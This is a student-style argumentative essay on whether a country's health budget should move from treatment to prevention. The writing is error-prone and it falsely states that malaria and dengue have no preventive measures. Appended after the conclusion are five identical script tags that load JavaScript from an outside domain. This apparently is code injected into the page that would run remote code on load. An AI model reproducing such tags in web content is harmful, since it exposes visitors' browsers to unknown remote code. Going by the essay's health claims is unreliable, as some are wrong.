"Prevention is better than cure." Out of a country's health budget, a large proportion

should be diverted from treatment to spending on health education and preventative

measures. To what extent do you agree or disagree with this statement?

Presently, the proliferation of funding prevention is noticeable. Some people support the idea that curing fund should be properly placed on other factors, leading to a balancing development in a country. Nonetheless, from my perspective, I partly concur with this viewpoint.

On the one hand, there is mounting evidence that funding treatment hold merit. When it comes to diseases such as malaria or dengue, there is no preventative approaches in advance, requiring treatment and proper solutions. Take an example of Covid-19 epidemic, it is evident that researchers and governments had to exert their best to handle with this sudden disease. Similarly, treatment embodies the improvement of medical field, leading to opportunities for jobs and future career for medical enthusiasts. Additionally, available treatment ensure social well-being, due to the fact that whenever residents is on the demand of, they could be treated in time, which is also a basic human right.

On the other hand, there is every likelihood that prevention also brings positive sides. Regarding human bodies, research has pointed out that the more patients endure from treatment, the more detrimental effects are on themselves. Moreover, in reference to ailments such as diabetes or cardiovascular, individuals could definitely get rid of with proper approaches, such as reducing the amount of salt and sugar daily. Furthermore, social well-being is also benefited from prevention. A substantial amount of money will be spent on other sectors, especially education and economy, ensuring the whole society. To illustrate, funding education is synonymous with propaganda and raising the awareness of people about the possibilities of unhealthy habits, keeping them informed about adopting a healthy lifestyle.

In conclusion, curing treatment is undoubtedly advantageous in terms of contagious diseases and human rights, while prevention also brings public awareness and financial problems. Hence, governments should maintain both types of medical, and people also should adopt healthy lifestyles to get a better life.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>